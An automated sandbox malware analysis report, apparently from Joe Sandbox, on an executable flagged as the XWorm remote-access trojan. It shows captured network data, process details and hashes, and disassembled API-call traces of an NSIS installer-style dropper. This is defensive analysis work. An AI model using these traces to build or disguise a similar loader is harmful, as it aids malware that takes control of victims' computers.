2024-10-26 06:44:30 UTC	8000	IN	Data Raw: 74 c4 00 9e f8 5b 29 32 38 c5 98 bb 84 87 94 5f 85 e7 38 d2 9a 5c a7 ce 70 da 12 26 ea ed 42 d6 42 2a d8 17 2e 49 85 b5 1b 17 07 8c 03 92 2f 8c 22 af 4d 92 26 5a fd fd 33 d6 b5 c4 bb c1 bb 7d 1c 77 1c 0d 93 0f 5c cd 15 85 f4 93 c6 b6 95 f2 b4 b4 04 3e 95 f2 f6 fb 93 32 60 00 53 8e c8 7d 41 0d d2 41 5e 99 a3 97 d1 c8 4a fc 74 7b c1 cd 05 5b 28 29 4c 1e 89 57 b2 c7 a0 17 d7 a1 64 35 d5 02 e4 d1 04 44 c0 48 8a aa 0c 95 93 8e bd 0a 27 0c 83 b6 91 6f a7 97 a6 66 56 f7 db 03 04 6b 0f 4e 04 66 f0 a9 cf 32 f9 44 1c ef 02 2e 7a 95 d8 53 21 a4 d1 41 08 d5 88 7b 56 37 64 41 e4 a7 0d 6b e8 76 3e f5 fa eb 10 7b 48 4d a5 68 ac d6 d0 ff 12 05 a1 fd 5d ea 28 30 9a a1 9b 53 43 9a 5c fd 6f 1c 4d 83 98 29 4f fb 94 76 0a f6 e9 ed 90 2c 3d 5a 48 8c cb a1 5e dd 92 6c 7b 04 e7 Data Ascii: t[)28_8\p&BB*.I/"M&Z3}w\>2`S}AA^Jt{[()LWd5DH'ofVkNf2D.zS!A{V7dAkv>{HMh](0SC\oM)Ov,=ZH^l{
2024-10-26 06:44:31 UTC	8000	IN	Data Raw: 74 d4 8a cb b5 2e 08 2f 30 fa fa dc 68 d1 9c bf 10 33 8d 07 c3 40 1e 38 30 2d 56 27 ef 94 c1 ae 28 35 2c d0 23 1f e2 37 4d 35 3c 43 b7 4d a2 91 fc e1 eb 38 dc c4 e5 e9 d5 58 9e d3 bb d5 97 4b 4b 90 40 1b 48 f2 08 72 74 59 ed 93 43 2f 35 fb b0 ab 65 cc 0c a6 61 1b b0 f5 8c 65 e5 5c 46 99 f3 eb d6 0e e7 43 a9 06 2a 0a b9 ec 25 d0 90 66 34 6b 93 6e fa 55 6f c7 e9 ad 68 22 8a 9c 88 cc 40 9b b9 19 23 26 38 e3 81 9f 90 db 0a 52 c6 45 69 f3 b8 3d 15 2c 6f 80 0a 91 2c 61 c1 df e7 7c 7a 6a dc 64 e7 1d 7e 18 d9 3d 07 30 82 1e 54 73 4b f1 fd 89 29 13 e8 e7 ed c3 52 69 80 d5 b0 f0 d1 bc 63 a9 8c c8 7e 39 93 3e d1 1a 27 0d 42 a1 87 8c 83 dd cf 93 5f f8 21 aa 69 ea fb 1f 1d 50 3a 85 ec d8 bc e2 94 16 e8 86 5c b7 da 2b e3 a2 13 ac 70 41 8f 99 1d 9c 31 4f f9 14 5a 21 6b Data Ascii: t./0h3@80-V'(5,#7M5<CM8XKK@HrtYC/5eae\FC*%f4knUoh"@#&8REi=,o,a\|zjd~=0TsK)Ric~9>'B_!iP:\+pA1OZ!k
2024-10-26 06:44:31 UTC	2424	IN	Data Raw: 76 08 cd d3 0b f1 48 c0 58 3c 95 a0 f7 b0 93 34 ed 08 59 e0 0c fc c4 3c bf cb 23 06 a7 13 48 02 91 b6 56 95 c7 3a 9c de 11 88 a8 dd ce 58 2a d5 6d a5 00 64 2e 31 bc 83 e0 27 4d 51 b0 15 be f0 e6 c6 87 51 92 f8 b1 f8 88 e7 50 9f 5c 62 5c 77 58 1a 8d 92 c5 4e 8b b8 81 c9 ff 80 b4 0b a0 96 58 0d 96 5f b0 11 08 6e 5f 79 4d c8 b8 32 66 4e ec cc 9e 43 9a b0 b3 66 f5 bb b3 2d d4 30 b4 ba 08 6e 8b 38 29 21 ec 81 4c 01 e2 c0 1e 2b a9 10 45 78 ce 76 67 70 24 03 28 c5 e7 72 c4 a5 7c 16 4b 88 36 ea 4b 70 f5 00 20 59 fa 07 19 38 de c0 07 f8 0e 7c 84 98 f3 90 59 ca bc 41 3a 32 a5 63 16 a5 76 40 a4 d2 49 ba 4d fa 27 2f 1e e8 57 62 eb e4 be ce c6 47 2c 24 4d d9 8c c1 b0 34 73 63 55 ae b6 9b 69 86 c8 8d 5d 67 cb 5e fa 33 4b 39 52 7b 5e 72 bf cd f8 89 70 38 62 86 62 4b bf Data Ascii: vHX<4Y<#HV:X*md.1'MQQP\b\wXNX_n_yM2fNCf-0n8)!L+Exvgp$(r\|K6Kp Y8\|YA:2cv@IM'/WbG,$M4scUi]g^3K9R{^rp8bbK

Target ID:	0
Start time:	02:43:25
Start date:	26/10/2024
Path:	C:\Users\user\Desktop\H33UCslPzv.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\Desktop\H33UCslPzv.exe"
Imagebase:	0x400000
File size:	3'212'629 bytes
MD5 hash:	9ECAE0D26219DDB2355AD7B597887760
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	5
Start time:	02:44:09
Start date:	26/10/2024
Path:	C:\Users\user\Desktop\H33UCslPzv.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\Desktop\H33UCslPzv.exe"
Imagebase:	0x400000
File size:	3'212'629 bytes
MD5 hash:	9ECAE0D26219DDB2355AD7B597887760
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_XWorm, Description: Yara detected XWorm, Source: 00000005.00000002.2750831860.00000000359CC000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
Reputation:	low
Has exited:	false

Show Windows behavior

Execution Graph

Execution Coverage:	20.8%
Dynamic/Decrypted Code Coverage:	0%
Signature Coverage:	16.3%
Total number of Nodes:	1537
Total number of Limit Nodes:	50

Executed Functions

Function 00403248 Relevance: 89.6, APIs: 32, Strings: 19, Instructions: 366
stringcomfileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

SetErrorMode.KERNELBASE ref: 0040326D
GetVersion.KERNEL32 ref: 00403273
lstrlenA.KERNEL32(UXTHEME,UXTHEME), ref: 004032A6
#17.COMCTL32(?,00000006,00000008,0000000A), ref: 004032E2
OleInitialize.OLE32(00000000), ref: 004032E9
SHGetFileInfoA.SHELL32(0079E508,00000000,?,00000160,00000000,?,00000006,00000008,0000000A), ref: 00403305
GetCommandLineA.KERNEL32(Frigatoon Setup,NSIS Error,?,00000006,00000008,0000000A), ref: 0040331A
CharNextA.USER32(00000000,"C:\Users\user\Desktop\H33UCslPzv.exe",00000020,"C:\Users\user\Desktop\H33UCslPzv.exe",00000000,?,00000006,00000008,0000000A), ref: 00403356
GetTempPathA.KERNELBASE(00000400,C:\Users\user\AppData\Local\Temp\,00000000,00000020,?,00000006,00000008,0000000A), ref: 00403453
GetWindowsDirectoryA.KERNEL32(C:\Users\user\AppData\Local\Temp\,000003FB,?,00000006,00000008,0000000A), ref: 00403464
lstrcatA.KERNEL32(C:\Users\user\AppData\Local\Temp\,\Temp,?,00000006,00000008,0000000A), ref: 00403470
GetTempPathA.KERNEL32(000003FC,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,\Temp,?,00000006,00000008,0000000A), ref: 00403484
lstrcatA.KERNEL32(C:\Users\user\AppData\Local\Temp\,Low,?,00000006,00000008,0000000A), ref: 0040348C
SetEnvironmentVariableA.KERNEL32(TEMP,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,Low,?,00000006,00000008,0000000A), ref: 0040349D
SetEnvironmentVariableA.KERNEL32(TMP,C:\Users\user\AppData\Local\Temp\,?,00000006,00000008,0000000A), ref: 004034A5
DeleteFileA.KERNELBASE(1033,?,00000006,00000008,0000000A), ref: 004034B9

Part of subcall function 00406385: GetModuleHandleA.KERNEL32(?,?,?,004032BB,0000000A), ref: 00406397
Part of subcall function 00406385: GetProcAddress.KERNEL32(00000000,?), ref: 004063B2

Part of subcall function 0040380A: lstrlenA.KERNEL32(Call,?,?,?,Call,00000000,C:\Users\user\AppData\Local\Temp\unscorified,1033,0079F548,80000001,Control Panel\Desktop\ResourceLocale,00000000,0079F548,00000000,00000002,76F93410), ref: 004038FA
Part of subcall function 0040380A: lstrcmpiA.KERNEL32(?,.exe), ref: 0040390D
Part of subcall function 0040380A: GetFileAttributesA.KERNEL32(Call), ref: 00403918
Part of subcall function 0040380A: LoadImageA.USER32(00000067,00000001,00000000,00000000,00008040,C:\Users\user\AppData\Local\Temp\unscorified), ref: 00403961
Part of subcall function 0040380A: RegisterClassA.USER32(007A26E0), ref: 0040399E

Part of subcall function 00403730: CloseHandle.KERNEL32(000002E4,00403567,?,?,00000006,00000008,0000000A), ref: 0040373B

OleUninitialize.OLE32(?,?,00000006,00000008,0000000A), ref: 00403567
ExitProcess.KERNEL32 ref: 00403588
GetCurrentProcess.KERNEL32(00000028,?,00000006,00000008,0000000A), ref: 004036A5
OpenProcessToken.ADVAPI32(00000000), ref: 004036AC
LookupPrivilegeValueA.ADVAPI32(00000000,SeShutdownPrivilege,?), ref: 004036C4
AdjustTokenPrivileges.ADVAPI32(?,?,?,?,00000000,?,00000000,00000000,00000000), ref: 004036E3
ExitWindowsEx.USER32(00000002,80040002), ref: 00403707
ExitProcess.KERNEL32 ref: 0040372A

Part of subcall function 00405709: MessageBoxIndirectA.USER32(0040A218), ref: 00405764

Strings

NSIS Error, xrefs: 0040330B
C:\Users\user\Desktop, xrefs: 004035BA, 004035BF, 004035EB
UXTHEME, xrefs: 0040329A, 0040329F, 004032A5
C:\Users\user\AppData\Local\Temp\unscorified, xrefs: 00403438, 00403539, 004035E3, 004035EC
Frigatoon Setup, xrefs: 00403310
"C:\Users\user\Desktop\H33UCslPzv.exe", xrefs: 00403320, 00403326, 004034DD
1033, xrefs: 004034B4
Low, xrefs: 00403486
Error launching installer, xrefs: 0040351F
~nsu, xrefs: 00403593
TMP, xrefs: 004034A0
C:\Users\user\AppData\Local\Temp\unscorified\Pacinian, xrefs: 00403544
TEMP, xrefs: 00403498
C:\Users\user\AppData\Local\Temp\, xrefs: 00403448, 0040344D, 00403463, 0040346F, 0040347E, 0040348B, 00403497, 0040349F, 00403598, 004035A9, 004035B4, 004035C0, 004035CD, 004035DC, 0040368B
\Temp, xrefs: 0040346A
", xrefs: 0040337B
C:\Users\user\Desktop\H33UCslPzv.exe, xrefs: 00403645
.tmp, xrefs: 004035AF
SeShutdownPrivilege, xrefs: 004036BE

Memory Dump Source

Source File: 00000000.00000002.1913907040.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1913866371.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1913929543.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1913954422.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1913954422.000000000077B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1913954422.0000000000780000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1913954422.0000000000785000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1913954422.0000000000787000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1913954422.00000000007A0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1913954422.00000000007A5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1913954422.00000000007A9000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1913954422.00000000007B4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1914284254.00000000007B6000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_H33UCslPzv.jbxd

Similarity

API ID: Process$ExitFile$EnvironmentHandlePathTempTokenVariableWindowslstrcatlstrlen$AddressAdjustAttributesCharClassCloseCommandCurrentDeleteDirectoryErrorImageIndirectInfoInitializeLineLoadLookupMessageModeModuleNextOpenPrivilegePrivilegesProcRegisterUninitializeValueVersionlstrcmpi
String ID: "$"C:\Users\user\Desktop\H33UCslPzv.exe"$.tmp$1033$C:\Users\user\AppData\Local\Temp\$C:\Users\user\AppData\Local\Temp\unscorified$C:\Users\user\AppData\Local\Temp\unscorified\Pacinian$C:\Users\user\Desktop$C:\Users\user\Desktop\H33UCslPzv.exe$Error launching installer$Frigatoon Setup$Low$NSIS Error$SeShutdownPrivilege$TEMP$TMP$UXTHEME$\Temp$~nsu
API String ID: 3776617018-2147290433
Opcode ID: 838075baaf5ca056da215ee939d52fd3958900b4641c77022dcb02f612f56dab
Instruction ID: 4b1384cee9ffc8e7d3909f75f513e580ba658b4e0f6039b9d7a5280b54d142a8
Opcode Fuzzy Hash: 838075baaf5ca056da215ee939d52fd3958900b4641c77022dcb02f612f56dab
Instruction Fuzzy Hash: B3C1E870104741AAD7216F759D89A2F3FA8AB86306F05453FF581B61E2CB7C8A15CB2E

Function 00405252 Relevance: 54.3, APIs: 36, Instructions: 282
windowclipboardmemoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetDlgItem.USER32(?,00000403), ref: 004052B1
GetDlgItem.USER32(?,000003EE), ref: 004052C0
GetClientRect.USER32(?,?), ref: 004052FD
GetSystemMetrics.USER32(00000002), ref: 00405304
SendMessageA.USER32(?,0000101B,00000000,?), ref: 00405325
SendMessageA.USER32(?,00001036,00004000,00004000), ref: 00405336
SendMessageA.USER32(?,00001001,00000000,?), ref: 00405349
SendMessageA.USER32(?,00001026,00000000,?), ref: 00405357
SendMessageA.USER32(?,00001024,00000000,?), ref: 0040536A
ShowWindow.USER32(00000000,?,0000001B,?), ref: 0040538C
ShowWindow.USER32(?,00000008), ref: 004053A0
GetDlgItem.USER32(?,000003EC), ref: 004053C1
SendMessageA.USER32(00000000,00000401,00000000,75300000), ref: 004053D1
SendMessageA.USER32(00000000,00000409,00000000,?), ref: 004053EA
SendMessageA.USER32(00000000,00002001,00000000,?), ref: 004053F6
GetDlgItem.USER32(?,000003F8), ref: 004052CF

Part of subcall function 004040B0: SendMessageA.USER32(00000028,?,00000001,00403EE0), ref: 004040BE

GetDlgItem.USER32(?,000003EC), ref: 00405412
CreateThread.KERNELBASE(00000000,00000000,Function_000051E6,00000000), ref: 00405420
CloseHandle.KERNELBASE(00000000), ref: 00405427
ShowWindow.USER32(00000000), ref: 0040544A
ShowWindow.USER32(?,00000008), ref: 00405451
ShowWindow.USER32(00000008), ref: 00405497
SendMessageA.USER32(?,00001004,00000000,00000000), ref: 004054CB
CreatePopupMenu.USER32 ref: 004054DC
AppendMenuA.USER32(00000000,00000000,00000001,00000000), ref: 004054F1
GetWindowRect.USER32(?,000000FF), ref: 00405511
TrackPopupMenu.USER32(00000000,00000180,?,?,00000000,?,00000000), ref: 0040552A
SendMessageA.USER32(?,0000102D,00000000,?), ref: 00405566
OpenClipboard.USER32(00000000), ref: 00405576
EmptyClipboard.USER32 ref: 0040557C
GlobalAlloc.KERNEL32(00000042,?), ref: 00405585
GlobalLock.KERNEL32(00000000), ref: 0040558F
SendMessageA.USER32(?,0000102D,00000000,?), ref: 004055A3
GlobalUnlock.KERNEL32(00000000), ref: 004055BC
SetClipboardData.USER32(00000001,00000000), ref: 004055C7
CloseClipboard.USER32 ref: 004055CD

Memory Dump Source

Source File: 00000000.00000002.1913907040.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1913866371.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1913929543.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1913954422.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1913954422.000000000077B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1913954422.0000000000780000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1913954422.0000000000785000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1913954422.0000000000787000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1913954422.00000000007A0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1913954422.00000000007A5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1913954422.00000000007A9000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1913954422.00000000007B4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1914284254.00000000007B6000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_H33UCslPzv.jbxd

Similarity

API ID: MessageSend$Window$ItemShow$Clipboard$GlobalMenu$CloseCreatePopupRect$AllocAppendClientDataEmptyHandleLockMetricsOpenSystemThreadTrackUnlock
String ID:
API String ID: 590372296-0
Opcode ID: fe83000176ef68774a1613465f0c1fa99a691d0f6c525a9b60e7a3ca6ad1dfb2
Instruction ID: e249d6b51738ec221da1a53d9ec42c2df55930041f70e6241115b0d1b6ef0d10
Opcode Fuzzy Hash: fe83000176ef68774a1613465f0c1fa99a691d0f6c525a9b60e7a3ca6ad1dfb2
Instruction Fuzzy Hash: D0A15AB1900608BFDF119F64DD85EAF7BB9FB48344F10802AFA41B61A1CB794E519F68

Function 004057B5 Relevance: 19.4, APIs: 7, Strings: 4, Instructions: 159
filestringCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

DeleteFileA.KERNELBASE(?,?,76F93410,C:\Users\user\AppData\Local\Temp\,00000000), ref: 004057DE
lstrcatA.KERNEL32(C:\Users\user\AppData\Local\Temp\nsj6A14.tmp,\*.*,C:\Users\user\AppData\Local\Temp\nsj6A14.tmp,?,?,76F93410,C:\Users\user\AppData\Local\Temp\,00000000), ref: 00405826
lstrcatA.KERNEL32(?,0040A014,?,C:\Users\user\AppData\Local\Temp\nsj6A14.tmp,?,?,76F93410,C:\Users\user\AppData\Local\Temp\,00000000), ref: 00405847
lstrlenA.KERNEL32(?,?,0040A014,?,C:\Users\user\AppData\Local\Temp\nsj6A14.tmp,?,?,76F93410,C:\Users\user\AppData\Local\Temp\,00000000), ref: 0040584D
FindFirstFileA.KERNELBASE(C:\Users\user\AppData\Local\Temp\nsj6A14.tmp,?,?,?,0040A014,?,C:\Users\user\AppData\Local\Temp\nsj6A14.tmp,?,?,76F93410,C:\Users\user\AppData\Local\Temp\,00000000), ref: 0040585E
FindNextFileA.KERNELBASE(00000000,00000010,000000F2,?,?,?,00000000,?,?,0000003F), ref: 0040590B
FindClose.KERNELBASE(00000000), ref: 0040591C

Strings

C:\Users\user\AppData\Local\Temp\, xrefs: 004057C2
C:\Users\user\AppData\Local\Temp\nsj6A14.tmp, xrefs: 0040580E, 00405814, 00405825, 0040585B
\*.*, xrefs: 00405820
"C:\Users\user\Desktop\H33UCslPzv.exe", xrefs: 004057B5

Memory Dump Source

Source File: 00000000.00000002.1913907040.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1913866371.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1913929543.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1913954422.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1913954422.000000000077B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1913954422.0000000000780000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1913954422.0000000000785000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1913954422.0000000000787000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1913954422.00000000007A0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1913954422.00000000007A5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1913954422.00000000007A9000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1913954422.00000000007B4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1914284254.00000000007B6000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_H33UCslPzv.jbxd

Similarity

API ID: FileFind$lstrcat$CloseDeleteFirstNextlstrlen
String ID: "C:\Users\user\Desktop\H33UCslPzv.exe"$C:\Users\user\AppData\Local\Temp\$C:\Users\user\AppData\Local\Temp\nsj6A14.tmp$\*.*
API String ID: 2035342205-2393089348
Opcode ID: 8fda1b6a8b55d101ad800504929e014ab0da255cf75589647b7755d6ebd2940b
Instruction ID: eea8dcc9899e8fe382e67b4d85d328ba4a3fbbae0ab86688a1659871ceec6938
Opcode Fuzzy Hash: 8fda1b6a8b55d101ad800504929e014ab0da255cf75589647b7755d6ebd2940b
Instruction Fuzzy Hash: 4051E171800A08FADF226B618C45FAF7A78DF42728F14807BF841B51D2D73C4992DE69

Function 004062F0 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 14fileCOMMON

Download Yara Rule

APIs

FindFirstFileA.KERNELBASE(76F93410,007A0D98,C:\Users\user\AppData\Local\Temp\nsj6A14.tmp,00405AB6,C:\Users\user\AppData\Local\Temp\nsj6A14.tmp,C:\Users\user\AppData\Local\Temp\nsj6A14.tmp,00000000,C:\Users\user\AppData\Local\Temp\nsj6A14.tmp,C:\Users\user\AppData\Local\Temp\nsj6A14.tmp,76F93410,?,C:\Users\user\AppData\Local\Temp\,004057D5,?,76F93410,C:\Users\user\AppData\Local\Temp\), ref: 004062FB
FindClose.KERNELBASE(00000000), ref: 00406307

Strings

C:\Users\user\AppData\Local\Temp\nsj6A14.tmp, xrefs: 004062F0

Memory Dump Source

Source File: 00000000.00000002.1913907040.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1913866371.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1913929543.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1913954422.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1913954422.000000000077B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1913954422.0000000000780000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1913954422.0000000000785000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1913954422.0000000000787000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1913954422.00000000007A0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1913954422.00000000007A5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1913954422.00000000007A9000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1913954422.00000000007B4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1914284254.00000000007B6000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_H33UCslPzv.jbxd

Similarity

API ID: Find$CloseFileFirst
String ID: C:\Users\user\AppData\Local\Temp\nsj6A14.tmp
API String ID: 2295610775-1184143763
Opcode ID: 6492e11af6876ec85f54452a190d9404ba6d94e49271ee4e7d15c167f534e484
Instruction ID: 3919553d01c23f7351ed85dbc682ed8077fcf54d37e588a2b2de2e61cdf0a9ad
Opcode Fuzzy Hash: 6492e11af6876ec85f54452a190d9404ba6d94e49271ee4e7d15c167f534e484
Instruction Fuzzy Hash: 14D012325451205BC75017786E0C88B7A589F963717214B36F9AAF61E0CB748C238AD8

Function 00403BA7 Relevance: 48.3, APIs: 32, Instructions: 346
windowstringCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000013), ref: 00403BE3
ShowWindow.USER32(?), ref: 00403C00
DestroyWindow.USER32 ref: 00403C14
SetWindowLongA.USER32(?,00000000,00000000), ref: 00403C30
GetDlgItem.USER32(?,?), ref: 00403C51
SendMessageA.USER32(00000000,000000F3,00000000,00000000), ref: 00403C65
IsWindowEnabled.USER32(00000000), ref: 00403C6C
GetDlgItem.USER32(?,00000001), ref: 00403D1A
GetDlgItem.USER32(?,00000002), ref: 00403D24
SetClassLongA.USER32(?,000000F2,?), ref: 00403D3E
SendMessageA.USER32(0000040F,00000000,00000001,?), ref: 00403D8F
GetDlgItem.USER32(?,00000003), ref: 00403E35
ShowWindow.USER32(00000000,?), ref: 00403E56
KiUserCallbackDispatcher.NTDLL(?,?), ref: 00403E68
EnableWindow.USER32(?,?), ref: 00403E83
GetSystemMenu.USER32(?,00000000,0000F060,00000001), ref: 00403E99
EnableMenuItem.USER32(00000000), ref: 00403EA0
SendMessageA.USER32(?,000000F4,00000000,00000001), ref: 00403EB8
SendMessageA.USER32(?,00000401,00000002,00000000), ref: 00403ECB
lstrlenA.KERNEL32(0079F548,?,0079F548,00000000), ref: 00403EF5
SetWindowTextA.USER32(?,0079F548), ref: 00403F04
ShowWindow.USER32(?,0000000A), ref: 00404038

Memory Dump Source

Source File: 00000000.00000002.1913907040.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1913866371.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1913929543.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1913954422.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1913954422.000000000077B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1913954422.0000000000780000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1913954422.0000000000785000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1913954422.0000000000787000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1913954422.00000000007A0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1913954422.00000000007A5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1913954422.00000000007A9000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1913954422.00000000007B4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1914284254.00000000007B6000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_H33UCslPzv.jbxd

Similarity

API ID: Window$Item$MessageSend$Show$EnableLongMenu$CallbackClassDestroyDispatcherEnabledSystemTextUserlstrlen
String ID:
API String ID: 3282139019-0
Opcode ID: 0a30aeb85d531018a1be584246925ac06f9566342ce983b6b2b6379f1775da4d
Instruction ID: b507ef7cb9582abf258fe264cbdb2372651992ce94f69c67437d7eaacc5d437d
Opcode Fuzzy Hash: 0a30aeb85d531018a1be584246925ac06f9566342ce983b6b2b6379f1775da4d
Instruction Fuzzy Hash: 09C1B0B1500204AFDB216F25EE85E2B7AB9EB8630AF00853EF741B11F1CB3D59529B5D

Function 0040380A Relevance: 47.5, APIs: 13, Strings: 14, Instructions: 215
stringregistryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 00406385: GetModuleHandleA.KERNEL32(?,?,?,004032BB,0000000A), ref: 00406397
Part of subcall function 00406385: GetProcAddress.KERNEL32(00000000,?), ref: 004063B2

lstrcatA.KERNEL32(1033,0079F548,80000001,Control Panel\Desktop\ResourceLocale,00000000,0079F548,00000000,00000002,76F93410,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\H33UCslPzv.exe",00000000), ref: 00403885
lstrlenA.KERNEL32(Call,?,?,?,Call,00000000,C:\Users\user\AppData\Local\Temp\unscorified,1033,0079F548,80000001,Control Panel\Desktop\ResourceLocale,00000000,0079F548,00000000,00000002,76F93410), ref: 004038FA
lstrcmpiA.KERNEL32(?,.exe), ref: 0040390D
GetFileAttributesA.KERNEL32(Call), ref: 00403918
LoadImageA.USER32(00000067,00000001,00000000,00000000,00008040,C:\Users\user\AppData\Local\Temp\unscorified), ref: 00403961

Part of subcall function 00405F4B: wsprintfA.USER32 ref: 00405F58

RegisterClassA.USER32(007A26E0), ref: 0040399E
SystemParametersInfoA.USER32(00000030,00000000,?,00000000), ref: 004039B6
CreateWindowExA.USER32(00000080,_Nb,00000000,80000000,?,?,?,?,00000000,00000000,00000000), ref: 004039EB
ShowWindow.USER32(00000005,00000000), ref: 00403A21
GetClassInfoA.USER32(00000000,RichEdit20A,007A26E0), ref: 00403A4D
GetClassInfoA.USER32(00000000,RichEdit,007A26E0), ref: 00403A5A
RegisterClassA.USER32(007A26E0), ref: 00403A63
DialogBoxParamA.USER32(?,00000000,00403BA7,00000000), ref: 00403A82

Strings

&z, xrefs: 00403970
RichEdit, xrefs: 00403A54
C:\Users\user\AppData\Local\Temp\unscorified, xrefs: 00403894, 0040389C, 00403934, 0040393A, 0040394A
RichEd32, xrefs: 00403A35
.DEFAULT\Control Panel\International, xrefs: 00403870
"C:\Users\user\Desktop\H33UCslPzv.exe", xrefs: 0040380E
1033, xrefs: 0040382A, 00403880
